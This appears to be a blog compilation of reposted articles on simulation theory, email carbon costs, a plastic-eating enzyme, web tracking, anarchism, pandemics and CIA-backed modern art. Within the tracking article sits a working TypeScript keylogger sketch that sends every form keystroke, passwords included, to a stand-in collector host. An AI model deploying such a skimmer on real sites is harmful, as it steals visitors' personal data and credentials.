If we were living in a simulation as convincing as The Matrix, would there be any discernible difference between the simulation and reality? Why would it matter ultimately whether our world was real or illusory?

Rizwan Virk
There are a lot of debates around this topic. Some of us wouldn’t want to know, and would rather take the metaphorical “blue pill” like in The Matrix.

Probably the most important question related to this is whether we are NPCs (non-player characters) or PCs (player characters) in the video game. If we are PCs, then that means we are just playing a character inside the video game of life, which I call the Great Simulation. I think many of us would like to know this. We would want to know the parameters of the game we’re playing so that we could better understand it, better navigate it.

If we are NPCs, or simulated characters, then I think it’s a more complicated answer and more frightening. The question is, are all of us NPCs in a simulation, and what is the purpose of that simulation? A knowledge of the fact that we’re in a simulation, and the goals of the simulation and the goals of our character, I think, would still be interesting to many people — and now we’re back to the case of the holodeck character from Star Trek that discovers that there is a world “out there” (outside the holodeck) that he can’t go to, and perhaps some of us would rather not know in that case.

Sean Illing
How close are we to having the technological capacity to build an artificial world that’s as realistic and plausible as The Matrix?

Rizwan Virk
I lay out 10 stages of technology development that a civilization would have to go through to get to what I call the simulation point, which is the point at which we can create a hyperrealistic simulation like this. We’re at about stage five, which is around virtual reality and augmented reality. Stage six is about learning to render these things without us having to put on glasses, and the fact that 3D printers now can print 3D pixels of objects shows us that most objects can be broken down as information.

But the really difficult part — and this is something not a lot of technologists have talked about — is in The Matrix, the reason they thought they were fully immersed was they had this cord going into the cerebral cortex, and that’s where the signal was beamed. This brain-computer interface is the area that we haven’t yet made that much progress in, but we are making progress in it. It’s in the early stages.

So my guess is within a few decades to 100 years from now, we will reach the simulation point.





VOX

Sunday, November 22, 2020

Can sending fewer emails really save the planet?

Are you the type of person who always says thank you? Well, if it's by email, you should stop, according to UK officials looking at ways to save the environment.

The Financial Times reports that we may all soon be encouraged to send one fewer email a day, cutting out "useless" one-line messages - such as "thanks".

Doing so "would save a lot of carbon", one official involved in next year's COP26 climate summit in Glasgow said.

But would it really make a huge difference?

Why do emails produce carbon at all?
Most people tend to think of the internet as a cloud that exists outside their computing hardware. But the reality is when you send an email - or anything else - it goes along a chain of energy-burning electronics.

Your wi-fi router sends the signal along wires to the local exchange - the green box on the street corner - and from there to a telecoms company, and from there to huge data centres operated by the tech giants. Each of those runs on electricity, and it all adds up.

But a single email's effect on such massive infrastructure is tiny.

Are my emails a big environmental problem?
The Financial Times report says the officials promoting this idea referred to a year-old press release from renewable electricity firm Ovo Energy.

It claimed that if every British person sent one fewer thank you email a day, it would save 16,433 tonnes of carbon a year, equivalent to tens of thousands of flights to Europe.

The problem, however, is that even if the sums involved roughly worked out, it would still be a splash in the pond.

The UK's annual greenhouse gas emissions were 435.2 million tonnes in 2019 - so the amount in question here is about 0.0037% of the national picture. And that's if every single British person reduced their email output.
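The percentage above is easy to verify; here is a quick check in TypeScript using only the two figures quoted in this article:

```ts
// Back-of-the-envelope check of the figures quoted above (tonnes of CO2e).
const claimedAnnualSaving = 16_433; // Ovo Energy's estimate for one fewer email a day
const ukEmissions2019 = 435.2e6;    // UK greenhouse gas emissions in 2019

const shareOfNationalTotal = claimedAnnualSaving / ukEmissions2019;
console.log(`${(shareOfNationalTotal * 100).toFixed(4)}%`); // ~0.0038% of the national total
```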

Mike Berners-Lee, a respected professor on the topic whose research was used in the Ovo Energy work, told the Financial Times it was based on "back-of-the-envelope" maths from 2010 - and while useful to start conversations, there were bigger questions.

On top of that, the estimate of how much carbon an email generates "takes into account absolutely everything involved", according to Chris Preist, professor of sustainability and computer systems at the University of Bristol.

It tries to include the energy used by servers, your home wi-fi, your laptop - even a very small share of the carbon emitted to construct the data centre buildings.

"The reality is that a lot of the system will still have impact, whether or not the email is sent," Prof Preist explains.

"Your laptop will still be on, your wi-fi will still be on, your home internet connection will still be on, the wider network will still use roughly the same amount of energy even with a reduction in volume.

"There will be a small saving in the data centre hosting the email, particularly if it allows them to use a few less servers. But the carbon saved will be far far less than 1g per email."

What can make a difference?
Rather than worrying about relatively low-impact emails, some researchers suggest we should turn our attention to services such as game and video-streaming and cloud storage which have a much larger effect.

But the topic is immensely complicated, and there is a debate about how estimates should be calculated - and who should be responsible for it.

Big tech firms such as Google, for example, are already proudly carbon-neutral: they pay subsidies for environmental projects to offset the carbon they burn providing your emails - and other services like YouTube.

"What really makes a difference is buying less kit, and keeping it for longer," Prof Preist explains. "But even this is small fry compared with your travel, heating your home, and what you eat."

He said consumers should focus their "eco-guilt" on things that make a difference - and not sweat the small stuff.

"That is the job of the companies providing the services, who should be designing their systems to deliver services in as energy and resource efficient way as possible."

His advice on email etiquette and thank you messages?

"Send an email if you feel that the other person will value it, and don't if they won't," he said.

"The biggest 'waste' both from an environmental and personal point of view will be the use of time by both of you."





BBC News

středa 21. října 2020

Super-enzyme eats plastic bottles six times faster

A super-enzyme that degrades plastic bottles six times faster than before has been created by scientists and could be used for recycling within a year or two.

The super-enzyme, derived from bacteria that naturally evolved the ability to eat plastic, enables the full recycling of the bottles. Scientists believe combining it with enzymes that break down cotton could also allow mixed-fabric clothing to be recycled. Today, millions of tonnes of such clothing are either dumped in landfill or incinerated.

Plastic pollution has contaminated the whole planet, from the Arctic to the deepest oceans, and people are now known to consume and breathe microplastic particles. It is currently very difficult to break down plastic bottles into their chemical constituents in order to make new ones from old, meaning more new plastic is being created from oil each year.

The super-enzyme was engineered by linking two separate enzymes, both of which were found in the plastic-eating bug discovered at a Japanese waste site in 2016. The researchers revealed an engineered version of the first enzyme in 2018, which started breaking down the plastic in a few days. But the super-enzyme gets to work six times faster.

“When we linked the enzymes, rather unexpectedly, we got a dramatic increase in activity,” said Prof John McGeehan, at the University of Portsmouth, UK. “This is a trajectory towards trying to make faster enzymes that are more industrially relevant. But it’s also one of those stories about learning from nature, and then bringing it into the lab.”





The Guardian

Tuesday, October 13, 2020

The High Privacy Cost of a “Free” Website

An array of free website-building tools, many offered by ad-tech and ad-funded companies, has led to a dizzying number of trackers loading on users’ browsers, even when they visit sites where privacy would seem paramount, an investigation by The Markup has found. Some load without the website operators’ explicit knowledge—or disclosure to users.

Website operators may agree to set cookies—small strings of text that identify you—from one outside company. But they are not always aware that the code setting those cookies can also load dozens of other trackers along with them, like nesting dolls, each collecting user data.

To investigate the pervasiveness of online tracking, The Markup spent 18 months building a one-of-a-kind free public tool that can be used to inspect websites for potential privacy violations in real time. Blacklight reveals the trackers loading on any site—including methods created to thwart privacy-protection tools or watch your every scroll and click.

We scanned more than 80,000 of the world’s most popular websites with Blacklight and found more than 5,000 were “fingerprinting” users, identifying them even if they block third-party cookies.

We also found more than 12,000 websites loaded scripts that watch and record all user interactions on a page—including scrolls and mouse movements. It’s called “session recording” and we found a higher prevalence of it than researchers had documented before.

More than 200 popular websites used a particularly invasive technique that captures personal information people enter on forms—like names, phone numbers, and passwords—before they hit send. It’s called “key logging” and it’s sometimes done as part of session recording.
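A minimal TypeScript sketch of what such a "key logging" script can look like in practice. The collection endpoint is hypothetical; this illustrates the technique described above, not any particular vendor's code.

```ts
// Sketch of "key logging" as described above: form input is captured and
// transmitted on every keystroke, before the user ever hits "send".
// The collection endpoint is hypothetical.

const COLLECT_URL = "https://collector.tracker.example/keys";

function watchForms(): void {
  const fields = document.querySelectorAll<HTMLInputElement | HTMLTextAreaElement>("input, textarea");
  fields.forEach((field) => {
    field.addEventListener("input", () => {
      // Fires on every keystroke, long before the form is submitted.
      navigator.sendBeacon(
        COLLECT_URL,
        JSON.stringify({ field: field.name, value: field.value, page: location.href })
      );
    });
  });
}

watchForms();
```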

Marketing and advertising companies are happy to provide these tools for free in exchange for user data, which is used to construct ever-more-refined profiles of internet users.

In other words, website operators are often effectively as blind to exactly what information advertising companies and marketers are collecting from their website visitors—and what they’re doing with the data—as the people browsing the internet are.

“I don’t want to say that the majority of websites don’t fully understand the data they’re collecting, but a large percentage do not,” said Michael Williams, a partner at Clym, a business that brings companies into compliance with online privacy laws like the European Union’s General Data Protection Regulation and the California Consumer Privacy Act.

He said when his firm scans websites, it often finds trackers the website operators did not know existed.

U.K.-based Privacy International found last year that some European mental health websites didn’t always know about the plethora of advertising-related tracking technologies that loaded from their sites onto users’ browsers.

Some small website operators say they don’t have much of a choice in the matter. Most of the tools available to build a robust, functional website on the internet have user tracking built into their very functionality. Even giving users the ability to search inside a website comes with strings attached.

“Google Search is a great tool that can be incorporated into a website, but then all searches as conducted by site visitors can be tracked to IP address,” said Fire Erowid of Erowid, the long-running nonprofit psychoactive drug information site. She said her team ended up building a “far worse” search function for the site to protect user privacy.

Frederik Zuiderveen Borgesius, a professor at Radboud University in the Netherlands who has written extensively on online privacy, said the pervasiveness of tracking could wreck one of the foundations of the internet: easy access to information, particularly for those who may have no other way to get it.

“Let’s say you’re a Muslim in India, or a Palestinian in Israel, or a homosexual in Poland,” he said. “At some point, you just feel uncomfortable looking for information about your own religion or own sexual preferences. Or you might be too uneasy about looking for information about sexually transmitted diseases because you fear that your behavior is monitored.”

Academic research has repeatedly shown that connecting supposedly anonymous marketing data to a name can be done with relative ease.

The operators of some sensitive sites said they knew their sites load marketing trackers—and they’ve made peace with the trade-off.

“It’s not good enough to have a website,” said Chris McMurry, a member of the group’s board of directors. “We have to invest in making sure that what’s on our website is seen by those who need it the most.”

The site also sells ad space, which comes with its own trackers, but the revenue helps him provide vital services.

The Markup’s findings underscore how the web’s foundational profit source, the online advertising industry, is trying to make money from every interaction on the internet—not just the obvious clicks, like visiting retailers.

Data collected from your detailed web browsing habits—what specific pages you visited, for how long, what you did there—can be tied to records of products and services you purchased both online and offline and tied to your identity through things like store consumer loyalty cards. This can then be linked to information collected from an app you downloaded on your smartphone or which movie or show you streamed last night. The profiles are filled with data about each visitor, including presumed interests and geographic location.

Companies claim this data allows them to make predictions about who is ready and able to buy certain products and provide those insights to sellers.

The ad-targeting categories offered by marketing companies can be surprising. The list produced by the Interactive Advertising Bureau, a prominent online ad industry trade group, has included things like “Incest/Abuse Support,” “Substance Abuse,” and “AIDS/HIV.” After this was reported publicly, the group removed the first category, but the others remain.

Many sites don’t load just one or two trackers—they load dozens of them because of a process called real-time bidding, which allows ads on a site to be personalized to whoever visits it.

When a user visits a page offering real-time ads, advertisers compete with each other for the ad space—in some cases tying users to those data-heavy profiles—in the blink of an eye. Regardless of who wins the auction to show the ad, all bidders are told who visited the site.
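A deliberately simplified TypeScript sketch of that auction flow (not the real OpenRTB protocol; names and bid logic are made up): every bidder receives the visitor's data in the bid request, whether or not it wins.

```ts
// Simplified sketch of the real-time-bidding flow described above (not the
// actual OpenRTB protocol): every bidder receives the user data in the bid
// request, regardless of who wins the auction.

type BidRequest = { userId: string; url: string; interests: string[] };
type Bidder = { name: string; bid: (req: BidRequest) => number };

function runAuction(request: BidRequest, bidders: Bidder[]): string {
  // Each bidder sees the request (and can log it) before bidding.
  const bids = bidders.map((b) => ({ name: b.name, price: b.bid(request) }));
  bids.sort((a, b) => b.price - a.price);
  return bids[0].name; // only the winner shows an ad, but everyone saw the data
}

const winner = runAuction(
  { userId: "abc123", url: "https://health-site.example/article", interests: ["allergies"] },
  [
    { name: "ad-network-a", bid: () => 0.42 },
    { name: "ad-network-b", bid: (r) => (r.interests.includes("allergies") ? 1.1 : 0.2) },
  ]
);
console.log(winner); // "ad-network-b"
```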

“Americans never agreed to be tracked and have their sensitive information sold to anyone with a checkbook,” a group of federal lawmakers wrote in a letter about real-time bidding to the Federal Trade Commission in July. “This outrageous privacy violation must be stopped and companies that are trafficking in Americans’ illicitly obtained private data should be shut down.”

They asked the agency to open an inquiry. FTC officials declined to say whether they have.

Websites serving people in Europe have had to get their affirmative consent before tracking users since 2018, when the European Union’s privacy law went into effect. Ironically, a 2019 study looking at those consent notifications found they are largely structured to encourage users to agree to tracking they otherwise wouldn’t readily allow and that they offer “no meaningful choice to consumers.”

The California Consumer Privacy Act requires large, for-profit companies doing business in the state to disclose what information their websites collect, allow users to opt out of collection, and delete users’ data upon request.

The only federal law specifically requiring websites in the U.S. to disclose user tracking applies only to websites serving children, but the Federal Trade Commission has gone after companies for “deceptive” practices for claiming that they don’t track users when in fact they do.

As for the ad industry’s solutions to online privacy concerns, they have largely centered on allowing people to either opt out of tracking or opt out of being served targeted ads related to that tracking. Google, Oracle, Facebook, and online advertising industry groups on both sides of the Atlantic offer some version of those options.

To exercise them, people have to ask each online advertising and marketing company individually and install a cookie on their devices reminding the company in question not to track them in the future. For some opt-outs, the companies require requestors to provide their full name, email, and physical address.
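Mechanically, each of those opt-outs is just another cookie scoped to that company's own domain, which is also why clearing your cookies erases the opt-out. A minimal sketch of what such a cookie could look like, using only Python's standard library and a hypothetical tracker domain:

    # Sketch only: builds an opt-out cookie header for one hypothetical tracker.
    from http.cookies import SimpleCookie

    def build_opt_out_header(company_domain: str) -> str:
        # One cookie per company; deleting your cookies deletes the opt-out too.
        cookie = SimpleCookie()
        cookie["optout"] = "1"
        cookie["optout"]["domain"] = company_domain
        cookie["optout"]["path"] = "/"
        cookie["optout"]["max-age"] = str(5 * 365 * 24 * 3600)  # roughly five years
        return cookie.output(header="Set-Cookie:")

    # Example with a made-up domain:
    print(build_opt_out_header(".example-tracker.com"))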

Facebook, for instance, continues to collect data on those who have opted out, spokesperson Alex Dziedzan confirmed. He said it does so for “non-ads” purposes like “measurement, security, integrity, etc.”







Aaron Sankin
Investigative Reporter

Surya Mattu
Investigative Data Journalist

neděle 13. září 2020

Are You An Anarchist? The Answer May Surprise You!

Chances are you have already heard something about who anarchists are and what they are supposed to believe. Chances are almost everything you have heard is nonsense. Many people seem to think that anarchists are proponents of violence, chaos, and destruction, that they are against all forms of order and organization, or that they are crazed nihilists who just want to blow everything up. In reality, nothing could be further from the truth. Anarchists are simply people who believe human beings are capable of behaving in a reasonable fashion without having to be forced to. It is really a very simple notion. But it’s one that the rich and powerful have always found extremely dangerous.

At their very simplest, anarchist beliefs turn on two elementary assumptions. The first is that human beings are, under ordinary circumstances, about as reasonable and decent as they are allowed to be, and can organize themselves and their communities without needing to be told how. The second is that power corrupts. Most of all, anarchism is just a matter of having the courage to take the simple principles of common decency that we all live by, and to follow them through to their logical conclusions. Odd though this may seem, in most important ways you are probably already an anarchist — you just don’t realize it.

If there’s a line to get on a crowded bus, do you wait your turn and refrain from elbowing your way past others even in the absence of police?
If you answered “yes”, then you are used to acting like an anarchist! The most basic anarchist principle is self-organization: the assumption that human beings do not need to be threatened with prosecution in order to be able to come to reasonable understandings with each other, or to treat each other with dignity and respect.

Everyone believes they are capable of behaving reasonably themselves. If they think laws and police are necessary, it is only because they don’t believe that other people are. But if you think about it, don’t those people all feel exactly the same way about you? Anarchists argue that almost all the anti-social behavior which makes us think it’s necessary to have armies, police, prisons, and governments to control our lives, is actually caused by the systematic inequalities and injustice those armies, police, prisons and governments make possible. It’s all a vicious circle. If people are used to being treated like their opinions do not matter, they are likely to become angry and cynical, even violent — which of course makes it easy for those in power to say that their opinions do not matter. Once they understand that their opinions really do matter just as much as anyone else’s, they tend to become remarkably understanding. To cut a long story short: anarchists believe that for the most part it is power itself, and the effects of power, that make people stupid and irresponsible.

Are you a member of a club or sports team or any other voluntary organization where decisions are not imposed by one leader but made on the basis of general consent?
If you answered “yes”, then you belong to an organization which works on anarchist principles! Another basic anarchist principle is voluntary association. This is simply a matter of applying democratic principles to ordinary life. The only difference is that anarchists believe it should be possible to have a society in which everything could be organized along these lines, all groups based on the free consent of their members, and therefore, that all top-down, military styles of organization like armies or bureaucracies or large corporations, based on chains of command, would no longer be necessary. Perhaps you don’t believe that would be possible. Perhaps you do. But every time you reach an agreement by consensus, rather than threats, every time you make a voluntary arrangement with another person, come to an understanding, or reach a compromise by taking due consideration of the other person’s particular situation or needs, you are being an anarchist — even if you don’t realize it.

Anarchism is just the way people act when they are free to do as they choose, and when they deal with others who are equally free — and therefore aware of the responsibility to others that entails. This leads to another crucial point: that while people can be reasonable and considerate when they are dealing with equals, human nature is such that they cannot be trusted to do so when given power over others. Give someone such power, they will almost invariably abuse it in some way or another.

Do you believe that most politicians are selfish, egotistical swine who don’t really care about the public interest? Do you think we live in an economic system which is stupid and unfair?
If you answered “yes”, then you subscribe to the anarchist critique of today’s society — at least, in its broadest outlines. Anarchists believe that power corrupts and those who spend their entire lives seeking power are the very last people who should have it. Anarchists believe that our present economic system is more likely to reward people for selfish and unscrupulous behavior than for being decent, caring human beings. Most people feel that way. The only difference is that most people don’t think there’s anything that can be done about it, or anyway — and this is what the faithful servants of the powerful are always most likely to insist — anything that won’t end up making things even worse.

But what if that weren’t true?

And is there really any reason to believe this? When you can actually test them, most of the usual predictions about what would happen without states or capitalism turn out to be entirely untrue. For thousands of years people lived without governments. In many parts of the world people live outside of the control of governments today. They do not all kill each other. Mostly they just get on about their lives the same as anyone else would. Of course, in a complex, urban, technological society all this would be more complicated: but technology can also make all these problems a lot easier to solve. In fact, we have not even begun to think about what our lives could be like if technology were really marshaled to fit human needs. How many hours would we really need to work in order to maintain a functional society — that is, if we got rid of all the useless or destructive occupations like telemarketers, lawyers, prison guards, financial analysts, public relations experts, bureaucrats and politicians, turned our best scientific minds away from working on space weaponry or stock market systems to mechanizing away dangerous or annoying tasks like coal mining or cleaning the bathroom, and distributed the remaining work among everyone equally? Five hours a day? Four? Three? Two? Nobody knows because no one is even asking this kind of question. Anarchists think these are the very questions we should be asking.

Do you really believe those things you tell your children (or that your parents told you)?
“It doesn’t matter who started it.” “Two wrongs don’t make a right.” “Clean up your own mess.” “Do unto others...” “Don’t be mean to people just because they’re different.” Perhaps we should decide whether we’re lying to our children when we tell them about right and wrong, or whether we’re willing to take our own injunctions seriously. Because if you take these moral principles to their logical conclusions, you arrive at anarchism.

Take the principle that two wrongs don’t make a right. If you really took it seriously, that alone would knock away almost the entire basis for war and the criminal justice system. The same goes for sharing: we’re always telling children that they have to learn to share, to be considerate of each other’s needs, to help each other; then we go off into the real world where we assume that everyone is naturally selfish and competitive. But an anarchist would point out: in fact, what we say to our children is right. Pretty much every great worthwhile achievement in human history, every discovery or accomplishment that’s improved our lives, has been based on cooperation and mutual aid; even now, most of us spend more of our money on our friends and families than on ourselves; while likely as not there will always be competitive people in the world, there’s no reason why society has to be based on encouraging such behavior, let alone making people compete over the basic necessities of life. That only serves the interests of people in power, who want us to live in fear of one another. That’s why anarchists call for a society based not only on free association but mutual aid. The fact is that most children grow up believing in anarchist morality, and then gradually have to realize that the adult world doesn’t really work that way. That’s why so many become rebellious, or alienated, even suicidal as adolescents, and finally, resigned and bitter as adults; their only solace, often, being the ability to raise children of their own and pretend to them that the world is fair. But what if we really could start to build a world which really was at least founded on principles of justice? Wouldn’t that be the greatest gift to one’s children one could possibly give?

Do you believe that human beings are fundamentally corrupt and evil, or that certain sorts of people (women, people of color, ordinary folk who are not rich or highly educated) are inferior specimens, destined to be ruled by their betters?
If you answered “yes”, then, well, it looks like you aren’t an anarchist after all. But if you answered “no”, then chances are you already subscribe to 90% of anarchist principles, and, likely as not, are living your life largely in accord with them. Every time you treat another human with consideration and respect, you are being an anarchist. Every time you work out your differences with others by coming to reasonable compromise, listening to what everyone has to say rather than letting one person decide for everyone else, you are being an anarchist. Every time you have the opportunity to force someone to do something, but decide to appeal to their sense of reason or justice instead, you are being an anarchist. The same goes for every time you share something with a friend, or decide who is going to do the dishes, or do anything at all with an eye to fairness.

Now, you might object that all this is well and good as a way for small groups of people to get on with each other, but managing a city, or a country, is an entirely different matter. And of course there is something to this. Even if you decentralize society and put as much power as possible in the hands of small communities, there will still be plenty of things that need to be coordinated, from running railroads to deciding on directions for medical research. But just because something is complicated does not mean there is no way to do it democratically. It would just be complicated. In fact, anarchists have all sorts of different ideas and visions about how a complex society might manage itself. To explain them though would go far beyond the scope of a little introductory text like this. Suffice it to say, first of all, that a lot of people have spent a lot of time coming up with models for how a really democratic, healthy society might work; but second, and just as importantly, no anarchist claims to have a perfect blueprint. The last thing we want is to impose prefab models on society anyway. The truth is we probably can’t even imagine half the problems that will come up when we try to create a democratic society; still, we’re confident that, human ingenuity being what it is, such problems can always be solved, so long as it is in the spirit of our basic principles — which are, in the final analysis, simply the principles of fundamental human decency.







David Graeber

sobota 2. května 2020

Pandemics of the Past and Future

Though no two pandemics are the same, each one that occurs has lessons to teach us about the next one. David Baltimore, President Emeritus and Robert Andrews Millikan Professor of Biology, is a virologist who studied HIV during the height of the AIDS pandemic in the 1980s and 1990s.

In 1975, Baltimore shared the Nobel Prize in Physiology or Medicine for his discovery of the enzyme that viruses such as HIV use to copy their RNA into DNA. These so-called retroviruses then permanently insert the DNA copy of their genes into a host cell, making it impossible to truly clear an infection. Though the novel coronavirus (severe acute respiratory syndrome coronavirus 2, or SARS-CoV-2) is fortunately not a retrovirus, it is still causing the most destructive global pandemic since the peak of the AIDS pandemic.


Can you first walk us through the timeline of the AIDS epidemic?
The AIDS epidemic started, actually, with some observations in Los Angeles of patients who were turning up at doctors' offices with a variety of strange symptoms, all of which suggested a failing immune system. It was a syndrome that had never been seen before. Particular skin diseases and mouth diseases and other things which, together, made no sense. These patients were largely gay men, and were seen by doctors who specialized in treating gay men.

The doctors reported these cases to the Centers for Disease Control in Atlanta, which published this occurrence as an oddity, but other doctors in other places recognized that they were seeing similar problems. It became a syndrome of unknown origin, and it took a while before the cause was recognized to be a virus, called human immunodeficiency virus or HIV.

Once it was clear that it was a virus, then it was able to be thought about as an infectious disease being spread from one person to another. That helped enormously to pinpoint the kind of problem it was, but it was clearly an agent we had never seen before. It turned out to be a virus belonging to a class of viruses that I had worked on 10 years before, called retroviruses. I had discovered that retroviruses had a unique enzyme capacity to make a DNA copy of their RNA. For that, I had won the Nobel Prize in 1975. Now, by the early 1980s, this class of viruses was well established, but no one had ever seen it causing a disease of this sort.

The HIV virus eventually was traced to a virus that's endemic in monkeys in Africa that made its way into chimpanzees, made its way into humans, and was being transmitted—poorly, but effectively—among humans. Poorly in the sense that it's not a very infectious virus. That all became clear over the 1980s and '90s.

Meanwhile, the HIV virus of course spread around the world. It is pretty uniformly lethal, causing a pandemic of disease and deaths. Luckily, people had been studying inhibitors of viruses like this, and there were on the shelf some drugs that immediately got tested for their ability to stop this disease. In fact, one of them, AZT, turned out to be very effective, although short-lived in its effect because the virus mutated against it. But, it gave the clue that this was the direction to go in the development of drugs. Many other drugs of that class were made by different pharmaceutical companies, and ultimately we got pretty good antiviral compounds.

The scientific community studied the nature of the virus and found other weak spots that were targets for drug development. We ended up with a wide spectrum of drugs to treat this disease with. Today, AIDS is maintained as a chronic disease, but its lethality has largely been controlled, at least in the developed world where the drugs are more consistently available. We now live with the AIDS virus, HIV, as part of our world.

So the AIDS pandemic was ultimately slowed with drugs for treatment, but not a vaccine to HIV. Why has there not been an HIV vaccine?
That's a very interesting story, because we assume we will be able to make a vaccine against most viruses when they're first discovered. Historically, we've made vaccines against a very wide range of viruses: smallpox and polio, measles, mumps, rubella, on and on. With that history, we expected to make a vaccine.

I was involved in thinking about this in the '80s, and when we looked at this virus, we saw that it had a characteristic that suggested that it might not be possible to make a vaccine. This characteristic is that the virus can and does mutate freely, so that it is constantly presenting a different immune profile. In spite of work by companies and university scientists around the world, we don't have a vaccine. There really has never been a virus that's been this recalcitrant to control and this lethal. Still, some of my colleagues are working on ways that we ultimately may be able to develop a vaccine.

So, this is the background against which COVID-19 has appeared. What are some differences between that pandemic and this one? For example, you mentioned that HIV is transmitted poorly, whereas the COVID-19 virus seems to be transmitting very readily.
Yes, one of the main differences is that SARS-CoV-2 is extremely infectious, whereas HIV is very poorly infectious.

There are many other differences between the two viruses. First of all, they're part of very different families of viruses. SARS-CoV-2 is a coronavirus. HIV we call a retrovirus or lentivirus. They have a completely different evolutionary history and a whole lot of differences in mechanisms. Although they are both viruses—that is they're very small agents that only grow inside cells—they behave in very different ways.

But they're similar in that they both came from animals. For HIV, it was monkeys, and for SARS-CoV-2, we think bats. They're both new to humans. We don't have any drugs to deal with coronaviruses because the coronaviruses have not been a big problem up until now. They were a small focal problem with the viruses that cause SARS and MERS [Middle East respiratory syndrome] which are coronaviruses, but those outbreaks were contained relatively quickly.

How are we tackling this current pandemic? Is the focus on treatment with drugs or development of a vaccine?
For the moment, we have nothing to deal with the virus. We're hoping maybe that drugs that were developed for other purposes might work against coronaviruses, but of course, we have no vaccine. We're starting from scratch. However, we have a huge armamentarium to work on this. We have companies that have made vaccines against many other viruses and that have developed drugs like those for HIV.

The scientific community is hopeful that making a vaccine against COVID-19 will be relatively straightforward. But we don't have experience to go on. We've never made a vaccine against any coronavirus because we haven't had to. We don't have the experience to know whether this class of viruses will be easy to deal with immunologically or difficult. I'm hopeful, but the virus is spreading so incredibly effectively that we don't have much time if we're going to have an impact on its spread.

So we've chosen the only route that we know will work to slow up the spread of the virus, and that is to stop people from congregating. This virus, like any other virus, only exists by spreading from one person to another person to another person. That spreading requires close contact between people, and that's why we're now asking people to stay six feet apart, to wear masks, to stay at home.

We're doing things that we've never done before on this scale to try to block the transmission, without drugs and without a vaccine. We have to accept the disruption of society, disruption of economic activity, disruption of intellectual activity, disruption of all ordinary behaviors.

The common cold is also often caused by a coronavirus; why is it not considered a pandemic?
The common cold is also a pandemic. But it's not lethal. There are hundreds of different kinds of viruses that cause the common cold—some of them being coronaviruses—but we don't usually worry about them because they take care of themselves. They cause a mild cold, often in kids, which then goes away.

Those kinds of coronaviruses are not serious causes of disease and so we don't worry about them. Even if they cause a pandemic—meaning, there are lots and lots of people around the world who are getting the sniffles—we just allow our immune systems to deal with it.

It's probably not a great idea that we ignore the common cold viruses. Public health officials sometimes do study the common cold, to at least understand its natural history and where it's distributed, how infectious it is, other things. But we don't put a lot of resources into that because it's not a real challenge to our society.

The COVID-19 virus is lethal in something like 1-5% of infections, unlike the common cold coronavirus, which is virtually never lethal. We had no pre-existing immunity to COVID-19 because it's never been seen in humans before, as far as we know. Now we are mobilizing to try to block its spread because it's killing people and its level of disruption of the ordinary functioning of our society is absolutely extraordinary. We've never seen anything like this since the flu epidemic of 1918—and very few of us saw that.

In hindsight, is there anything that you think epidemiologists and public health officials should have done differently to handle the AIDS pandemic, and anything that you think we should be doing differently now to handle this pandemic?
Well, the AIDS pandemic was handled very poorly. At the time, in the early 1980s, it seemed to be a disease that mainly affected gay men. At that time, homosexuality was treated as a deviance. President Reagan didn't even want to use the word AIDS, the word HIV, the word gay. So we were very slow in developing a response to the HIV epidemic because of homophobia. It really took a decade or two before we recognized that, first of all, this was a virus that was found in the homosexual community very extensively, but also outside of it, and particularly in Africa.

We had to realize that we needed to treat it as a threat to our society, not just as a disease of a particular class of people. We then were much more effective in preventing it by preventing contact and by treating it with the drugs that came along. But it took a long time.

In 1986, I was co-chair of a committee of the National Academy of Sciences that issued a report called Confronting AIDS. This was an activity that should have been undertaken by the federal government, but the federal government was afraid of touching it. So, it was done by the National Academy of Sciences and it laid out a plan for the country to study the virus, to respond to the virus, and act. Money was appropriated by Congress, and we started a serious research program. But that was five years after we knew the nature of the virus.

The start of our response to COVID-19 was very similar to our response to HIV. We tried to pigeonhole it as a disease of only certain people, Chinese people for COVID-19 or homosexuals for AIDS. We tried to ignore it. We knew, in the scientific community, that viruses don't only affect one group of people, that they spread to everybody. As soon as we knew COVID-19 was infectious, we knew it was going to spread everywhere in the world. We're now discovering that the terrible epidemic in New York City actually started in February, but nobody was paying attention to it. And it came from Europe, it didn't come from China.

The scientific community understands that a new pandemic is a part of the history of pandemics and that what happened once before is going to happen again.

What can we, as a society, do to be preparing for the next viral pandemic?
We must put the resources into protecting ourselves and build up our capabilities in the areas of epidemiology, public health, vaccines, rapid responses, and virus science in general.

We should have a cadre of public health people who are studying these problems continually, looking at all of the viruses in the natural world and saying one by one, "If this one got loose, what would we do?" and prepare ourselves. We can do all of that. It's not actually enormously expensive. But it means, first of all, we can't depend on our industries to do it because it's not economically attractive.

It's something that has to be done by the public and that means there has to be money put aside for it. Over my whole lifetime, what I have seen is that every time there is an epidemic, we say, "Now we've got to study this and prepare ourselves for the next one." But within a couple of years, that impetus is gone, the money has been reassigned to other problems and we're not maintaining our surveillance of the natural world. We're not maintaining our capabilities in vaccine and drug development, so we have to start all over again when the next disease comes along. That's shortsighted. It is the reality of politics, however.

Now that researchers are working on drugs and vaccines, and the rest of society seems to be mobilized in our own ways with the stay-at-home directives and protective measures, is there anything in particular that you think we can be doing better?
Well, I'm actually very impressed with what's going on. Some companies have simply said, "We're going to devote our expertise to this problem and we're not going to worry about the economics of it." I think we will have a response to this problem, but the response is already too late. What we've seen with this epidemic is that once the genie's out of the bottle, so to speak, it spreads so widely and so quickly that unless we have all of our defenses ready to go, we're going to be too late. We are now too late.
We should learn from this. We should already have a national program to make sure that the next time this happens, we're not so defenseless.





WRITTEN BY Lori Dajose

neděle 26. dubna 2020

Was Modern Art Really a CIA Psy-Op?

In the mid-twentieth century, modern art and design represented the liberalism, individualism, dynamic activity, and creative risk possible in a free society. Jackson Pollock’s gestural style, for instance, drew an effective counterpoint to Nazi, and then Soviet, oppression. Modernism, in fact, became a weapon of the Cold War. Both the State Department and the CIA supported exhibitions of American art all over the world.

The preeminent Cultural Cold Warrior, Thomas W. Braden, who served as MoMA’s executive secretary from 1948 to 1949, joined the CIA in 1950 to supervise its cultural activities. Braden noted, in a Saturday Evening Post article titled “I’m glad the CIA is ‘immoral’” that American art “won more acclaim for the U.S. …than John Foster Dulles or Dwight D. Eisenhower could have bought with a hundred speeches.”

The relationship between Modern Art and American diplomacy began during WWII, when the Museum of Modern Art was mobilized for the war effort. MoMA was founded in 1929 by Abby Aldrich Rockefeller. A decade later, her son Nelson Rockefeller became president of the Museum. In 1940, while he was still President of MoMA, Rockefeller was appointed the Roosevelt Administration’s Coordinator of Inter-American affairs. He also served as Roosevelt’s Assistant Secretary of State in Latin America.

